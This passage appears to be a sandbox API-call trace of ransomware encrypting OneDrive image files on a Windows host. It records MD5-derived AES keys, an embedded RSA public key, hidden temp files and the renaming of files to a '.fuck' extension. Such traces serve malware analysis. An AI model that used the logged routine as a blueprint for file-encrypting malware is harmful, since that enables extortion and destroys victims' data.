lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.693] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.694] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.695] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.697] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.697] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.697] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.697] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.697] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.697] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.697] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2bea0) returned 1 [0277.698] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2bea0, dwCertEncodingType=0x1, pInfo=0x2f35aa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35ad0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35ad8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbb48) returned 1 [0277.698] CryptEncrypt (in: hKey=0x2fbb48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.698] CryptEncrypt (in: hKey=0x2fbb48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2ccf8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2ccf8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2ccf8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2ccf8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x1b0, lpOverlapped=0x0) returned 1 [0277.700] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x1b0, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x1c0) returned 1 [0277.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x1c0, lpOverlapped=0x0) returned 1 [0277.700] CloseHandle (hObject=0x5d48) returned 1 [0277.700] CloseHandle (hObject=0x5d3c) returned 1 [0277.701] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg"), bFailIfExists=0) returned 1 [0277.704] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg", dwFileAttributes=0x0) returned 1 [0277.704] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg.gsg")) returned 1 [0277.705] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\loading_spinner.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\loading_spinner.svg.fuck")) returned 1 [0277.707] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.707] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.707] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.707] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.707] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.707] GetLastError () returned 0x0 [0277.707] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg")) returned 0x20 [0277.708] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg", dwFileAttributes=0x80) returned 1 [0277.709] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.719] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.721] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.721] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.724] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.724] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.724] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.724] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.724] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.724] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.724] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c830) returned 1 [0277.724] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c830, dwCertEncodingType=0x1, pInfo=0x2f34cd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34d00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34d08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbbc8) returned 1 [0277.724] CryptEncrypt (in: hKey=0x2fbbc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.725] CryptEncrypt (in: hKey=0x2fbbc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2bf28*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2bf28*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.725] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2bf28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2bf28*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.726] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.731] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.732] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.734] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.735] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.735] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.735] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.735] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.735] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.736] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.736] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.736] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.736] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0277.736] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x150, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x160) returned 1 [0277.736] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x160, lpOverlapped=0x0) returned 1 [0277.736] CloseHandle (hObject=0x5d3c) returned 1 [0277.736] CloseHandle (hObject=0x5d48) returned 1 [0277.737] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg"), bFailIfExists=0) returned 1 [0277.740] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg", dwFileAttributes=0x0) returned 1 [0277.740] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg.gsg")) returned 1 [0277.742] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandFiles.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandfiles.svg.fuck")) returned 1 [0277.743] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.743] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.743] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.743] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.743] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.743] GetLastError () returned 0x0 [0277.743] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg")) returned 0x20 [0277.744] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg", dwFileAttributes=0x80) returned 1 [0277.744] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.745] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\ondemandselectivesync.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\onDemandSelectiveSync.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.746] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.748] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.749] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.749] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.749] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.749] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.749] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.749] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c258) returned 1 [0277.749] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c258, dwCertEncodingType=0x1, pInfo=0x2f36120*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36150*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36158*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbec8) returned 1 [0277.749] CryptEncrypt (in: hKey=0x2fbec8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.750] CryptEncrypt (in: hKey=0x2fbec8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c588*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c588*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2c588*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c588*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 